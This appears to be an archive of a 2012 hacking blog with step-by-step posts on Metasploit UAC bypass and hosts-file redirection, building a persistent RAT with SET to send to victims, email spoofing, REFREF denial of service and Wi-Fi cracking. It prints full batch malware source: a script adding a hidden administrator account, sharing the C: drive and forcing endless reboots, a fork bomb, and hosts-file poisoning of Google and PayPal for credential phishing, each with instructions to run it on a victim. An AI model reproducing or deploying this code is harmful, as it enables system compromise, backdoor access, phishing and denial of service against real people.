Friday, December 28, 2012

D.N.S. poisoning using metasploit.

0 comments
Today we will edit hot file of the Remote P.C which has been compromised. By editing Host file you can Redirect any website to any I.P address. Absolutely we will use metasploit.

(1)Hack remote p.c .(How to hack Remote P.C.?)

(2)Now we will Bypass U.A.C. protection of windows.

(3)Open Terminal & type following code in terminal

msfconsole

use exploit/windows/local/bypassuac

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.6

set session 1

exploit

(4)Now we will edit host file.

msf >use post/windows/manage/injet_host

msf post(injet_host) >set domain www.google.com

msf post(injet_host) >set ip Your Desired I.P.

msf post(injet_host) >set session 2

msf post(injet_host) >exploit

This will Redirect google.com in victim p.c to your desired I.P.

Monday, December 24, 2012

How to use R.A.T. through S.E.T?

1 comments
RAT is Remote Administration tool , using RAT you can control Remote P.C. ,there are lots of software available for RAT , but they are made from hackers, there is possibility of back-door in that readily available software. So today we use RAT through Social engineering toolkit(SET).

(1)Open your terminal & type

cd /opt/set

./set

(2)update your set

(3)Now select option 3 which is Third party Modules

(4)Now select option 2 which is RATTE (Remote administration tool tommy edition).

(5)Enter I.P. Address of your computer to connect back

(6)Port RATTE Server should listen on [8080]: press enter

(7)Should RATTE be persistent [no|yes]?:yes

(8)Use specifix filename (ex. firefox.exe) [filename.exe or empty]?:cool.exe

(9) Payload has been exported to src/program_junk/ratteM.exe

(10)Now send your ratteM.exe files to victim, as soon as they download and open it

Start the ratteserver listener now [yes|no]:yes

(11)chose 1 option which is list client

(12)if the payload been executed successfully, then you will see a new session and the client details. Note down the session number. Enter the session you want to interact with:press 0 here

Now choose option2 “activate client”

Now you get menu with lots of menu. Select 1st option which is start shell.

Saturday, December 22, 2012

How to install & configure send mail in Ubuntu?

10 comments
Send mail is program which will help you to send email through command, you can send email from terminal or CMD . In this program we use our machine as a server. I will show you how to install & configure Send-Mail. So we can spoof email to targets. But problem is that this email is detected as spam due to automatic sending through machine.

How to Install Send-Mail?


Open terminal & type following command in terminal.

sudo apt-get install mailutils

sudo apt-get install sendmail


How to configure it?


After installing sendmail , you should configure sendmail. It`s little hard. But don`t worry after that we can spoof email to anyone.

Type following command on terminal

sudo gedit /etc/mail/sendmail.mc

It will open sendmail.mc file.

For example your last two lines are as follow

MAILER(`local')dnl

MAILER(`smtp')dnl

Put this code before that two lines.

MAILER_DEFINITIONS

define('SMART_HOST',`smtp.gmail.com')

Ok. now close that file

Now we will generate configure file from .mc file so type following command in terminal.

sudo bash -c 'cd/etc/mail/ && m4 sendmail.mc >sendmai.cf'

Now everything is complete, try to send mail using terminal or use Social Engineering Tool-Kit as i mention in previous post.


How to send mail through Command?


open terminal and type following command.

telnet 127.0.0.1 25

HELO server

MAIL from:sender`s email address

RCPT to: Recipient address

DATA

Subject:Test mail

from: sender`s email address

to: receiver`s address

Test Mail

.

quit


Now check spam folder of receiver`s email , you got email . Now check show original option of email , you can see that i.p. of computer , o.s. , many other things.

Thursday, December 20, 2012

How to install social engineering toolkit(S.E.T.) in ubuntu?

9 comments
Social Engineering Tool kit is cool tool which came with BACKTRACK, this increase power of metasploit. If you are on any linux system other than BACKTRACK , then you can install it .

Updated:This article was written when S.E.T. use SVN. Now it`s move to github. So please click here to new installation method.

Extra package which is necessary to use SET effectively are as follow.

(1)Metasploit:- You can see my old post about how to install metasploit in ubuntu here.

(2)Ettercap:- If you are on any network & want to attack on network like Man in the Middele Attack or DNS poisoning then you require it.

To install Ettercap open terminal in type following command:-

sudo apt-get install ettercap

(3)Openjdk-6-It`s necessary program to use SET. Just type following command in terminal

sudo apt-get install openjdk-6-jdk


Now open terminal & change directory to opt.

sudo bash

cd /opt

svn co http://svn.secmaniac.com/social_engineering_toolkit set/

cd /opt/set

svn update

nano config/set_config

Now we will configure it. First it require metaspolit path . So we will put it on configure file. Here comes problem , in first step we install metasploit , it`s directory is opt/metasploit-4.4.0/msf3. But when we put this path in configure file it cannot detect metasploit . So we have to rename metasploit-4.4.0 to framework3. So rename metasploit-4.4.0 folder name to framework3.

Put opt/framework3/msf3 this path in config file. Save it.Type in terminal.

./set

It will open SET .

In next tutorial I will show you how to configure sendmail & use it in set.

I Know I cannot explain good, So if you face any problem please mention in comment.

Updated:This article was written when S.E.T. use SVN. Now it`s move to github. So please click here to new installation method.

Monday, December 17, 2012

Download Free E-books about Hacking

792 comments

Hello guys, if you want to learn more about Hacking & Computer Security ,i uploaded below eBooks on dropbox.Download link is in end.

List of Books are as follow.

(1)CEH(Certified Ethical Hackers)2010V6.

(2)Hacking Wireless Networks For Dummies.

(3)H gray hat hacking.

(4)Blind_SQLInjection.

(5)backtrack-4-assuring-security-by-penetration-testing.

(6)Collections of Ankit Fadia Hacking Book.

(7)Secrets of Reverse Engineering.

(8)Social Engineering toolkit

(9)Ethical Hacking and Countermeasures- Web Applications and Data Servers.

New books Added

(10)CSRF attack & Defense

(11)Armitage guide

(12)Pass-the-hash attacks: Tools and Mitigation

(13)HACKING: THE ART OF EXPLOITATION


(14)XSS Attacks - Exploits and Defense


(15)Seven Deadliest Network Attack 


Download link:- Please click here.

Sunday, December 16, 2012

How to use REFREF?

0 comments
As we know in past , famous Hacktivist group Anonymous carried out series Of DDOS attack in number of websites like paypal ,master-card ,visa. At that time they used tool LOIC for down the website.

Although they got success in their project ,but due to LOIC some of hackers arrested later. So they decide to build new weapon for DOS attack.

It was REFREF. It is programmed in perl ,java ,python.But main requirement is URL must be vulnerable to SQL injection. It mean if you found website which is vulnerable to SQL injection , then by using this tool you can easily down website.

You can Download REFREF SCRIPT from here.

How to use?


It`s pretty simple. Just open terminal change path & Execute script.

cd Downloads

perl refref.pl vulnerable URL

It will down website in short time. This tools is very effective , 17 second attacks from single machine resulting down 42 min outage on pastebin.

Friday, December 14, 2012

Batch File Virus -4

0 comments
@echo off

cd\

cd %SystemRoot%\system32\

md 1001

cd\

cls

rem N0 H4rm 15 cau53d unt1| N0w

rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| ch4ng3 th3 t1m3 2 12:00:00.0 & d4t3 as 01/01/2000

echo 12:00:00.00 | time >> nul

echo 01/01/2000 | date >> nul

net users Microsoft_support support /add

rem Th3 u53r 4cc0unt th4t w45 Cr34t3d 15 ju5t 4 |1m1t3d 4cc0unt

rem Th15 p13c3 0f c0d3 w1|| m4k3 th3 |1m1t3d u53r 4cc0unt5 t0 4dm1n15tr4t0r 4cc0unt.

net localgroup administrators Microsoft_support /add

rem 5h4r3 th3 R00t Dr1v3

net share system=C:\ /UNLIMITED

cd %SystemRoot%\system32\1001

echo deal=msgbox (”Microsoft Windows recently had found some Malicious Virus on your computer, Press Yes to Neutralize the virus or Press No to Ignore the Virus”,20,”Warning”) >

%SystemRoot%\system32\1001\warnusr.vbs

rem ch4ng35 th3 k3yb04rd 53tt1ng5 ( r4t3 4nd d3|4y )

mode con rate=1 > nul

mode con delay=4 >> nul

rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| d15p|4y 50m3 4nn0y1ng m5g, as c0d3d ab0v3, 3×4ct|y

@ 12:01 and 12:02

at 12:01 /interactive “%SystemRoot%\system32\1001\warnusr.vbs”

at 12:02 /interactive “%SystemRoot%\system32\1001\warnusr.vbs”

msg * “You are requested to restart your Computer Now to prevent Damages or Dataloss” > nul

msg * “You are requested to restart your Computer Now to prevent Damages or Dataloss” >>

nul

rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| c0py th3 warnusr.vbs f1|3 2 th3 5t4rtup, th4t w1|| b3 3×3cut3d @ 3v3ryt1me th3 c0mput3r 5t4rt5

copy %SystemRoot%\system32\1001\warnusr.vbs “%systemdrive%\Documents and Settings\All

Users\Start Menu\Programs\Startup\warnusr.vbs”

rem

***************************************************************************

rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| d15p|4y Th3 5hutd0wn d14|05 B0X w1th 50m3 m5g and w1|| r35t4rt c0nt1nu0u5|y

echo shutdown -r -t 00 -c “Microsoft has encountered a seriuos problem, which needs your attention right now. Hey your computer got infected by Virus. Not even a single anti-virus can detect this virus now. Wanna try? Hahahaha....! ” > %systemroot%\system32\1001\sd.bat

copy %systemroot%\Documents and Settings\All Users\Start Menu\Programs\Startup\sd.bat

“%systemdrive%\Documents and Settings\All Users\Start Menu\Programs\Startup\sd.bat”

rem

***************************************************************************

cd\

cls

rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| m4k3 th3 v1ru5 b1t 5t34|th13r

cd %systemdrive%\Documents and Settings\All Users\Start Menu\Programs\Startup\

attrib +h +s +r warnusr.vbs

attrib +h +s +r sd.bat

cd\

cd %systemroot%\system32

attrib +h +s +r 1001

rem K1||5 th3 3xp|0r3r.3×3 Pr0c355

taskkill /F /IM explorer.exe

rem @ EOV // End of Virus

Copy the source code and paste it in a notepad, then save it with the .bat extension. This virus program will begin its operation at C:\windows\system32 and creates a new directory with name '1001', changes the time to 12:00 and date to 01-01-2000, then creates a new user with account name 'Microsoft_support' with a password 'support' matching the account.

It automatically assigns administrator rights to the user account that was created, then shares the root drive 'C:' which really is a security issue making the system completely vulnerable. It will create a VBScript file with name 'warnusr.vbs' that is used to display a message 'Microsoft Windows recently had found some Malicious Virus on your computer, Press Yes to Neutralize the virus or

Press No to Ignore the Virus', that really seems to be coming from the operating system itself, then it will change the keyboard setting by reducing the rate and delay time. Since the time and date has been already modified by the virus, it will automatically pop up a message stating 'You are requested to restart your Computer Now to prevent Damages or Data loss' exactly at 12:01 and 12:02, if the user restarts the computer, then it’s gone.

Whenever the user try to login to the computer, it will automatically reboots continuously, because the command 'shutdown -r' is set with time 00, and kept in start-up folder, the user has nothing to stop this unless he enters in safe mode and delete the file, more over the file is set with system and hidden attribute making it invisible.

The only way to stop this is to enter in safe mode and disable the start-up items, and then delete the file that reside in C:\windows\system32\1001 and in the start-up folder.

You can also use some exe-binders to bind this virus with any audio, video, text or whatever the files may be, then use some social engineering technique to make the victim execute the file by himself to harm his/her computer.

You can create this virus without using any third party tools in windows, also instead of exe-binder, you can use the ‘iexpress’ wizard to create a custom package.

Wednesday, December 12, 2012

Batch File Virus -3

0 comments
Most of them have heard about the word ‘fork()’, which is used to create child process, like wise fork bombing is nothing but calling a program by itself again and again with a infinite loop and making the system to crash by popping up hundreds of windows on the screen.

@echo off

:loop

Explorer

Call fork.bat

Goto loop

Copy the above program and paste it in a notepad file and save it as ‘fork.bat’. The explorer command will open up the ‘documents’ directory, and it is given inside a loop, then the same batch file is called again which in turn opens up multiple documents rolled out in a loop, likewise it goes on by calling the program itself again and again until the system crashes or hangs up.

Tuesday, December 11, 2012

Batch file virus -2

0 comments
Batch program offers its programmers to create their custom viruses just by misusing the way the command works, which leads to the creation of batch viruses. In this chapter we are going to learn about the dark-side of the batch by learning how to misuse commands to create batch viruses.

Folder Replicator Virus:

Here is a Simple batch virus that contains only 6 lines, has the tendency to replicate itself again and again and keeps on creating a folder with same name, until a user stops it.

1. Just open up a notepad, copy and paste the below code

cd\

cd C:\Documents and Settings\username\Desktop

:loop

md Virus

cd Virus

goto loop

2. Save it as a batch file with the extension .bat, before doing that you have to modify the code by changing the place where it says ‘username’ and instead of that replace it by the currently logged in username.

3. Then run it on the Victims computer to infect it.

4. Any how it doesn’t cause much harm, but replicates folder inside a folder and goes on.

Once more thing that you have to notice is that, this will create directory inside another directory with the same name, so it doesn’t looks like crap, since everything reside inside one main directory, more over deleting the root directory will purge all the clumsy thing done by this piece of code.

Monday, December 10, 2012

DNS poisoning using BATCH File

1 comments
Batch file programming is the native programming offered by the Microsoft Windows Operating System. Batch file is created using any text editors like notepad, WordPad, WinWord or so on, which comprises of a sequence of built-in commands used to perform some often done tasks like deleting a series of files of same type or of different type, creating logs, clearing unwanted craps from your computer and even for creating a batch VIRUS.

DNS poisoning:


Batch file can has the tendency to modify the transfer zones by editing the hosts.txt file that resides inside ‘C:\windows\system32\drivers\etc\hosts.txt’, so that it will take you to some malicious websites instead of landing you to the legitimate website. This may also be used for phishing, i.e. redirecting you to a bogus website which looks exactly like the legitimate one, and then steal credentials.

1. Just open up a notepad, copy and paste the below code

@echo off

echo 10.199.64.66 www.google.com >> C:\windows\system32\drivers\etc\hosts.txt

echo 10.199.64.67 www.paypal.com >> C:\windows\system32\drivers\etc\hosts.txt

exit

2. Save it as a batch file with the extension .bat

3. Then run it on the Victims computer to infect it.

4.This program creates a new entry in the hosts file, so that whenever an user attempts to move to www.google.com, he will be re-directed to another host that has the IP address of 10.199.64.66, likewise if the user attempts to login to the paypal account by typing in www.paypal.com, he will be re-directed to another external bogus website that has the IP address of 10.199.64.67, where if the user enters the credentials unknowingly, they were into the hackers database and he can use it for several other purposes.

Saturday, December 8, 2012

How to scan web-server with Nikto?

0 comments
Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6500 potentially dangerous files/CGIs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software. Scan items and plugins are frequently updated and can be automatically updated.

Nikto is not designed as an overly stealthy tool. It will test a web server in the quickest time possible, and is fairly obvious in log files. However, there is support for LibWhisker's anti-IDS methods in case you want to give it a try (or test your IDS system).

Not every check is a security problem, though most are. There are some items that are "info only" type checks that look for things that may not have a security flaw, but the webmaster or security engineer may not know are present on the server. These items are usually marked appropriately in the information printed. There are also some checks for unknown items which have been seen scanned for in log files.

Nikto is a tool that it has been written in Perl and it can perform tests against web servers in order to identify potential vulnerabilities

 Download Nikto from here.

 Open terminal & extract it in folder

 Then change directory, type following code in terminal

    cd Downloads/nikto-2.1.5

 Make nikto.pl file exectuable(right click on file, & make it executable)

 Update it by typing following command

    ./nikto.pl -update

 Now final step to scan webhost type following in termina

   ./nikto.pl -host I.p

Tuesday, December 4, 2012

how to Browser Autopwn attack in metasploit?

0 comments

In this article we will examine the effectiveness of metasploit browser autopwn module.The basic idea behind that module is that it creates a web server in our local machine which will contain different kind of browser exploits.When the user will open the malicious link then the execution of the exploits will start against the browser of the user and if one of the exploits is successful a meterpreter session will open.
In order to use this attack we have to open the metasploit framework and to use the browser_autopwn module.In the next image you can see the available options and default settings for this module.

metasploit-autopwn

Monday, December 3, 2012

How to crack wi-fi password in ubuntu?

17 comments

For this purpose we are going to use Ubuntu. First we have to install air-crack program in o.s
(1)install aircrack
sudo apt-get install aircrack-ng

(2) You need to go in root first. For this purpose type “sudo su -“ and type your password.

(3)now type following command in terminal
Code:
# iwconfig wlan0 mode monitoring
Note: If some sort of error occurs type “# iwconfig” in a terminal to check for your wireless.

(4)After that it’s time to scan for a wireless network which we will compromise with educational purpose. This time we will use the command:
Code:
# airodump-ng wlan0 
crack-wi-fi-password-in-ubuntu

How to exploit VSFTPD ?

0 comments

VSFTPD, which stands for "Very Secure FTP Daemon"[1], is an FTP server for Unix-like systems, including Linux.

VSFTPD is an FTP server that it can be found in unix operating systems like Ubuntu, CentOS, Fedora and Slackware. By default this service is secure however a major incident happened in July 2011 when someone replaced the original version with a version that contained a backdoor. The backdoor exists in the version 2.3.4 of VSFTPD and it can be exploited through metasploit.

So first we scan port 21 is it vsftpd 2.3.4 or not, for this purpose you can use nmap.
So let’s assume that we have scanned a host and we have discovered the version 2.3.4 of VSFTPD running on the system.
We can open the metasploit framework in order to search for the vsftpd module.
vsftpd-exploit

As we can see there is only one module that we can use. So we will start the configuring the module appropriately. In the next screenshot you can see the configurations that we need to do in this exploit in order to be executed successfully.
vsftpd-exploit
UA-35960349-1